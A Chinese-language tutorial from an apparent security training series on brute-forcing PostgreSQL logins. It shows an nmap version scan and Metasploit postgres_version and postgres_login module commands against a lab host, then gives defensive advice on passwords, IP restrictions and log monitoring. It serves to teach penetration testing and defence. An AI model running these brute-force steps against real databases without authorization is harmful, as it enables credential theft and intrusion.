6-22漏洞利用-postgresql数据库密码破解

6-22漏洞利用-postgresql数据库密码破解_第1张图片

postgresql介绍

PostgreSQL是关系数据库,加州大学伯克利分校计算机系开发的POSTGRES,现在已经更名为PostgreSQL,版本4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分SQL标准并且提供了许多其他现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL可以用许多方法扩展,比如,通过增加新的数据类型、函数、操作符、聚集函数、索引。免费使用、修改和分发PostgreSQL,不管是私用、商用,还是学术研究使用。

https://www.postgresql.org/

探测目标postgresql

使用nmap -sV -p 5432 IP地址 探测目标postgresql版本信息。

nmap -sV -p 5432 192.168.1.105

6-22漏洞利用-postgresql数据库密码破解_第2张图片

默认情况下,postgresql的端口号是5432,我们探测完postgresql之后,就对postgresql进行安全测试,我们想到的是用密码字典对postgresql进行暴力破解

msf暴力破解postgresql

在msf下使用postgresql_login模块 破解postgresql登录用户名和密码

msfconsole
use auxiliary/scanner/postgres/postgres_version
show options
set rhosts 192.168.1.105
show options
run

6-22漏洞利用-postgresql数据库密码破解_第3张图片

6-22漏洞利用-postgresql数据库密码破解_第4张图片

metersploit测试的更加精细化,直接给出了对应的版本,但是不一定是正确的,因为探测有误差,我们大致可以认为是8.3.x版本

use auxiliary/scanner/postgres/postgres_login
show options
run

6-22漏洞利用-postgresql数据库密码破解_第5张图片

当我们拿到用户名和密码之后,就要想到用用户名和密码进行登录

登录postgresql

利用pyadmin客户端软件登陆postgresql

6-22漏洞利用-postgresql数据库密码破解_第6张图片

我们无法连接到数据库,是因为版本无法支持,但是,我们同样可以查看,我们也可以使用命令行的工具来登录

我们在以后的探测中,一定要多种工具同时探测,以确保工具的准确性

我们对于暴力破解最好的防御措施,使用比较复杂的字母数字符号组合成的密码,来防止对应的暴力破解,以及我们可以设置可以登录IP地址的范围,使得我们过滤掉一些不安全的IP,同时,我们也要监控登录的日志,使得我们出现异常登录,可以即时的发现,问题以及所在

你可能感兴趣的:(网络安全训练营,数据库,postgresql)